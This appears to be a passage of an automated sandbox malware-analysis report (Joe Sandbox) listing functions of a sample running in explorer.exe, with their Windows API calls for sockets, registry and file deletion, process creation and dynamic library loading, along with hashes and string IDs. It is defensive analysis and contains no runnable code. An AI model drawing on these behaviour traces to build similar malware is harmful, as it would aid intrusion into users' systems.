                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                          • String ID: S:(ML;;NW;;;LW)
                          • API String ID: 173816248-495562761
                          • Opcode ID: f905f424248e15589d132c37e9be0cc03c94c5fa6fb97b89272881f21c89416e
                          • Instruction ID: 9f6249a4b67f7e3277f3f0a61de390312365f0d85b5c254f30adb127a55ce742
                          • Opcode Fuzzy Hash: f905f424248e15589d132c37e9be0cc03c94c5fa6fb97b89272881f21c89416e
                          • Instruction Fuzzy Hash: CE11DB72208A8582E7149F54F49578BBBB0F7C5798F60002AE78947A68DFBDC549CF40
                          Function 011A2160 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemDirectoryW.KERNEL32 ref: 011A218F
                          • GetVolumeInformationW.KERNEL32 ref: 011A21E0
                            • Part of subcall function 011ADC00: CryptAcquireContextW.ADVAPI32 ref: 011ADC4E
                            • Part of subcall function 011ADC00: CryptCreateHash.ADVAPI32 ref: 011ADC77
                            • Part of subcall function 011ADC00: WaitForSingleObject.KERNEL32 ref: 011ADCE5
                            • Part of subcall function 011ADC00: CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                            • Part of subcall function 011ADC00: CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextHash$AcquireCreateDestroyDirectoryInformationObjectReleaseSingleSystemVolumeWait
                          • String ID:
                          • API String ID: 2609862481-0
                          • Opcode ID: a35bb54f1f73ba14eb1c2990bdd3d20f108409ba1b821c1f3c15cf64e819ed8e
                          • Instruction ID: ccec57cb24b47b6e8ecedf8e606d039379fdc57e857bdbb550e51d0ff4158e19
                          • Opcode Fuzzy Hash: a35bb54f1f73ba14eb1c2990bdd3d20f108409ba1b821c1f3c15cf64e819ed8e
                          • Instruction Fuzzy Hash: B1119236228AC082E728CB64F88879B77A1F784744FA04026E789C7E58DB7EC449CB04
                          Function 011A7B60 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcWindow
                          • String ID:
                          • API String ID: 181713994-0
                          • Opcode ID: 31c9c0b5947c44be4f1d2d09d6ca79a6a5646e6c6c14db69b613b66a64f539fd
                          • Instruction ID: 3b586f04c2f5809efc5c182ad01ee7d3b2b2e54f3698ca01294638291bef8968
                          • Opcode Fuzzy Hash: 31c9c0b5947c44be4f1d2d09d6ca79a6a5646e6c6c14db69b613b66a64f539fd
                          • Instruction Fuzzy Hash: 5C0121B910C680CBD73CAB5CE01435ABF60F3C5749F804526E78942A98CB7FC6848F42
                          Function 011A9999 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcAddressForCaller.KERNELBASE ref: 011A99FF
                          • GetProcAddress.KERNEL32 ref: 011A9A5E
                          • LoadLibraryExW.KERNEL32 ref: 011A9AA8
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CallerLibraryLoad
                          • String ID:
                          • API String ID: 3311809864-0
                          • Opcode ID: 100a539388ed10e765e593ae9632a672f362217d4cd857549dcdeec64cc44426
                          • Instruction ID: 404537cda561d50d6dd5edc36a6a77fd249a0677ffb152cf6f48c97e703e1d89
                          • Opcode Fuzzy Hash: 100a539388ed10e765e593ae9632a672f362217d4cd857549dcdeec64cc44426
                          • Instruction Fuzzy Hash: A101A53AB18BC985DB34CB08E0907AAB760F3C6744F804516D68E42A68DB7DD555CB42
                          Function 011A8D53 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcAddressForCaller.KERNELBASE ref: 011A8DBC
                          • GetProcAddress.KERNEL32 ref: 011A8E1E
                          • LoadLibraryW.KERNEL32 ref: 011A8E68
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CallerLibraryLoad
                          • String ID:
                          • API String ID: 3311809864-0
                          • Opcode ID: f12bac732cab75a28ea2f441fae935218d77663a432a707c6d2a7bcdaf3ad6d8
                          • Instruction ID: 35c97d0c271daf910e677e0915a2214113bbcf2f69f589ac3b7b86de9c000c83
                          • Opcode Fuzzy Hash: f12bac732cab75a28ea2f441fae935218d77663a432a707c6d2a7bcdaf3ad6d8
                          • Instruction Fuzzy Hash: 1101C43A618BC5CADB35CB08E4D43AAB764F3D5745F800116C68E83B68DF39C559CB41
                          Function 011A7910 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 58f56a68dde3867d7acb8a7956f5aa7bba3c9146910bc749bbf72c40a0543847
                          • Instruction ID: 99598631d4243720f5907f22f91b3097985791073a199fd87f462ac41a840a6e
                          • Opcode Fuzzy Hash: 58f56a68dde3867d7acb8a7956f5aa7bba3c9146910bc749bbf72c40a0543847
                          • Instruction Fuzzy Hash: 2BF0C03550974585F72CEB64F8197D13A90F344328F84522BD649957B4EB7E8289CA01
                          Function 01195230 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: b32d8231ed20fe3a6c646cd57c97a2d13eb4c555140a907c0ff916a62f50b3f8
                          • Instruction ID: 85652bc8cdd6fcb9e8efdfc7b167fc1d42df18dbed5238d5b050f4fc85af6b58
                          • Opcode Fuzzy Hash: b32d8231ed20fe3a6c646cd57c97a2d13eb4c555140a907c0ff916a62f50b3f8
                          • Instruction Fuzzy Hash: C6F04831D08745C5FBADDB60F8283D527A2F35434CF50116BF655596A0CBFD8185C741

                          Non-executed Functions

                          Function 0119A8C0 Relevance: 96.7, APIs: 42, Strings: 13, Instructions: 440stringregistrylibraryCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 0119AB8A
                          • SetEvent.KERNEL32 ref: 0119ABFF
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                          • wnsprintfW.SHLWAPI ref: 0119AC32
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119AC50
                          • wnsprintfW.SHLWAPI ref: 0119AC83
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119ACA1
                          • wnsprintfW.SHLWAPI ref: 0119ACD4
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119ACF2
                          • wnsprintfW.SHLWAPI ref: 0119AD25
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119AD43
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F390
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3A6
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3B1
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F3D3
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3E9
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3F4
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01194277), ref: 011A05CB
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A05EF
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A0625
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0630
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A063B
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A0652
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A066A
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A06B2
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A06FD
                            • Part of subcall function 011A05B0: RemoveDirectoryW.KERNEL32 ref: 011A0708
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A0713
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A071E
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0729
                            • Part of subcall function 0119FD90: CoInitializeEx.COMBASE ref: 0119FDC0
                            • Part of subcall function 0119FD90: CoUninitialize.COMBASE ref: 011A01C3
                            • Part of subcall function 011A0330: OpenEventW.KERNEL32 ref: 011A0351
                            • Part of subcall function 011A0330: SetEvent.KERNEL32 ref: 011A0372
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A0380
                            • Part of subcall function 011A0330: OpenMutexW.KERNEL32 ref: 011A03A0
                            • Part of subcall function 011A0330: WaitForSingleObject.KERNEL32 ref: 011A03C6
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A03D4
                            • Part of subcall function 011A0330: SHGetKnownFolderPath.SHELL32 ref: 011A03EE
                            • Part of subcall function 011A0330: LocalAlloc.KERNEL32 ref: 011A0406
                            • Part of subcall function 011A0330: lstrlenW.KERNEL32 ref: 011A0467
                            • Part of subcall function 011A0330: GetFileAttributesW.KERNEL32 ref: 011A04F3
                            • Part of subcall function 011A0330: LocalFree.KERNEL32 ref: 011A0543
                            • Part of subcall function 011A0330: CoTaskMemFree.COMBASE ref: 011A0551
                            • Part of subcall function 011A0330: wnsprintfW.SHLWAPI ref: 011A057E
                            • Part of subcall function 011A0330: RegDeleteKeyExW.ADVAPI32 ref: 011A0596
                            • Part of subcall function 011A01E0: SHGetKnownFolderPath.SHELL32 ref: 011A01F8
                            • Part of subcall function 011A01E0: LocalAlloc.KERNEL32 ref: 011A0210
                            • Part of subcall function 011A01E0: lstrlenW.KERNEL32 ref: 011A0262
                            • Part of subcall function 011A01E0: GetFileAttributesW.KERNEL32 ref: 011A02CA
                            • Part of subcall function 011A01E0: LocalFree.KERNEL32 ref: 011A030B
                            • Part of subcall function 011A01E0: CoTaskMemFree.COMBASE ref: 011A0316
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                          • GetFileAttributesW.KERNEL32 ref: 0119AE29
                          • SHFileOperationW.SHELL32 ref: 0119AE48
                          • LocalFree.KERNEL32 ref: 0119AE79
                          • GetWindowsDirectoryW.KERNEL32 ref: 0119AF37
                          • CreateProcessW.KERNEL32 ref: 0119B00A
                          • GetCurrentProcess.KERNEL32 ref: 0119B019
                          • DuplicateHandle.KERNEL32 ref: 0119B06B
                          • GetCurrentProcess.KERNEL32 ref: 0119B07A
                          • DuplicateHandle.KERNEL32 ref: 0119B0CB
                          • LoadLibraryW.KERNEL32 ref: 0119B0E2
                          • GetProcAddress.KERNEL32 ref: 0119B120
                          • GetProcAddress.KERNEL32 ref: 0119B13E
                          • lstrcpyW.KERNEL32 ref: 0119B15C
                          • lstrcpyA.KERNEL32 ref: 0119B172
                          • lstrcpyA.KERNEL32 ref: 0119B188
                          • lstrcpyA.KERNEL32 ref: 0119B19E
                          • lstrcpyA.KERNEL32 ref: 0119B1B4
                          • lstrcpyA.KERNEL32 ref: 0119B1CA
                          • lstrcpyA.KERNEL32 ref: 0119B1DD
                          • lstrcpyW.KERNEL32 ref: 0119B1F3
                          • lstrcpyW.KERNEL32 ref: 0119B209
                          • LocalFree.KERNEL32 ref: 0119B2D2
                          • CloseHandle.KERNEL32 ref: 0119B2F7
                          • CloseHandle.KERNEL32 ref: 0119B305
                          • TerminateProcess.KERNEL32 ref: 0119B31F
                          • LocalFree.KERNEL32 ref: 0119B32D
                          • OpenEventW.KERNEL32 ref: 0119B341
                          • SetEvent.KERNEL32 ref: 0119B362
                          • CloseHandle.KERNEL32 ref: 0119B370
                          • shutdown.WS2_32 ref: 0119B383
                          • closesocket.WS2_32 ref: 0119B391
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Deletelstrcpy$CloseHandle$AllocFilewnsprintf$EventFolderKnownOpenPathTask$Processlstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindowsclosesocketsetsockoptshutdown
                          • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$Spotify.exe$h${2046C745-B848-47EE-8068-B039EAC15A1C}${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 1118244034-3169802617
                          • Opcode ID: 7037301a7e069a12b47916f7d44cc6767f50f69d42ba6e202ef66847cf1e683c
                          • Instruction ID: bb698933e1a80d60b235713ed5014262e00f3f9491596e6ee7b065434aa4f9b1
                          • Opcode Fuzzy Hash: 7037301a7e069a12b47916f7d44cc6767f50f69d42ba6e202ef66847cf1e683c
                          • Instruction Fuzzy Hash: 1242F236218BC595DB75DB14F8983DAB3A5F788759F800126DA8D83B68EF3CC249CB40
                          Function 0119DE20 Relevance: 96.7, APIs: 42, Strings: 13, Instructions: 422stringregistrylibraryCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32 ref: 0119E085
                          • GetLocalTime.KERNEL32 ref: 0119E0B4
                          • SystemTimeToFileTime.KERNEL32 ref: 0119E0CA
                          • wnsprintfW.SHLWAPI ref: 0119E14B
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E169
                            • Part of subcall function 011A7E10: lstrlenW.KERNEL32 ref: 011A7E5C
                          • wnsprintfW.SHLWAPI ref: 0119E19C
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E1BA
                          • wnsprintfW.SHLWAPI ref: 0119E1ED
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E20B
                          • wnsprintfW.SHLWAPI ref: 0119E23E
                          • RegDeleteKeyExW.ADVAPI32 ref: 0119E25C
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F390
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3A6
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3B1
                            • Part of subcall function 0119F370: RegOpenKeyW.ADVAPI32 ref: 0119F3D3
                            • Part of subcall function 0119F370: RegDeleteValueW.ADVAPI32 ref: 0119F3E9
                            • Part of subcall function 0119F370: RegCloseKey.ADVAPI32 ref: 0119F3F4
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01194277), ref: 011A05CB
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A05EF
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A0625
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0630
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A063B
                            • Part of subcall function 011A05B0: SHGetKnownFolderPath.SHELL32 ref: 011A0652
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A066A
                            • Part of subcall function 011A05B0: LocalAlloc.KERNEL32 ref: 011A06B2
                            • Part of subcall function 011A05B0: DeleteFileW.KERNEL32 ref: 011A06FD
                            • Part of subcall function 011A05B0: RemoveDirectoryW.KERNEL32 ref: 011A0708
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A0713
                            • Part of subcall function 011A05B0: LocalFree.KERNEL32 ref: 011A071E
                            • Part of subcall function 011A05B0: CoTaskMemFree.COMBASE ref: 011A0729
                            • Part of subcall function 011A0330: OpenEventW.KERNEL32 ref: 011A0351
                            • Part of subcall function 011A0330: SetEvent.KERNEL32 ref: 011A0372
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A0380
                            • Part of subcall function 011A0330: OpenMutexW.KERNEL32 ref: 011A03A0
                            • Part of subcall function 011A0330: WaitForSingleObject.KERNEL32 ref: 011A03C6
                            • Part of subcall function 011A0330: CloseHandle.KERNEL32 ref: 011A03D4
                            • Part of subcall function 011A0330: SHGetKnownFolderPath.SHELL32 ref: 011A03EE
                            • Part of subcall function 011A0330: LocalAlloc.KERNEL32 ref: 011A0406
                            • Part of subcall function 011A0330: lstrlenW.KERNEL32 ref: 011A0467
                            • Part of subcall function 011A0330: GetFileAttributesW.KERNEL32 ref: 011A04F3
                            • Part of subcall function 011A0330: LocalFree.KERNEL32 ref: 011A0543
                            • Part of subcall function 011A0330: CoTaskMemFree.COMBASE ref: 011A0551
                            • Part of subcall function 011A0330: wnsprintfW.SHLWAPI ref: 011A057E
                            • Part of subcall function 011A0330: RegDeleteKeyExW.ADVAPI32 ref: 011A0596
                            • Part of subcall function 011A01E0: SHGetKnownFolderPath.SHELL32 ref: 011A01F8
                            • Part of subcall function 011A01E0: LocalAlloc.KERNEL32 ref: 011A0210
                            • Part of subcall function 011A01E0: lstrlenW.KERNEL32 ref: 011A0262
                            • Part of subcall function 011A01E0: GetFileAttributesW.KERNEL32 ref: 011A02CA
                            • Part of subcall function 011A01E0: LocalFree.KERNEL32 ref: 011A030B
                            • Part of subcall function 011A01E0: CoTaskMemFree.COMBASE ref: 011A0316
                            • Part of subcall function 0119FD90: CoInitializeEx.COMBASE ref: 0119FDC0
                            • Part of subcall function 0119FD90: CoUninitialize.COMBASE ref: 011A01C3
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                          • GetFileAttributesW.KERNEL32 ref: 0119E342
                          • SHFileOperationW.SHELL32 ref: 0119E361
                          • LocalFree.KERNEL32 ref: 0119E392
                          • GetWindowsDirectoryW.KERNEL32 ref: 0119E450
                          • CreateProcessW.KERNEL32 ref: 0119E523
                          • GetCurrentProcess.KERNEL32 ref: 0119E532
                          • DuplicateHandle.KERNEL32 ref: 0119E584
                          • GetCurrentProcess.KERNEL32 ref: 0119E593
                          • DuplicateHandle.KERNEL32 ref: 0119E5E4
                          • LoadLibraryW.KERNEL32 ref: 0119E5FB
                          • GetProcAddress.KERNEL32 ref: 0119E639
                          • GetProcAddress.KERNEL32 ref: 0119E657
                          • lstrcpyW.KERNEL32 ref: 0119E675
                          • lstrcpyA.KERNEL32 ref: 0119E68B
                          • lstrcpyA.KERNEL32 ref: 0119E6A1
                          • lstrcpyA.KERNEL32 ref: 0119E6B7
                          • lstrcpyA.KERNEL32 ref: 0119E6CD
                          • lstrcpyA.KERNEL32 ref: 0119E6E3
                          • lstrcpyA.KERNEL32 ref: 0119E6F6
                          • lstrcpyW.KERNEL32 ref: 0119E70C
                          • lstrcpyW.KERNEL32 ref: 0119E722
                          • LocalFree.KERNEL32 ref: 0119E7DE
                          • CloseHandle.KERNEL32 ref: 0119E803
                          • CloseHandle.KERNEL32 ref: 0119E811
                          • TerminateProcess.KERNEL32 ref: 0119E82B
                          • LocalFree.KERNEL32 ref: 0119E839
                          • OpenEventW.KERNEL32 ref: 0119E84D
                          • SetEvent.KERNEL32 ref: 0119E86E
                          • CloseHandle.KERNEL32 ref: 0119E87C
                          • LocalFree.KERNEL32 ref: 0119E887
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Deletelstrcpy$CloseFileHandle$Allocwnsprintf$FolderKnownOpenPathTask$EventProcesslstrlen$AttributesTime$AddressCurrentDirectoryDuplicateObjectProcSingleValueWait$CreateInitializeLibraryLoadMutexOperationRemoveSystemTerminateUninitializeWindows
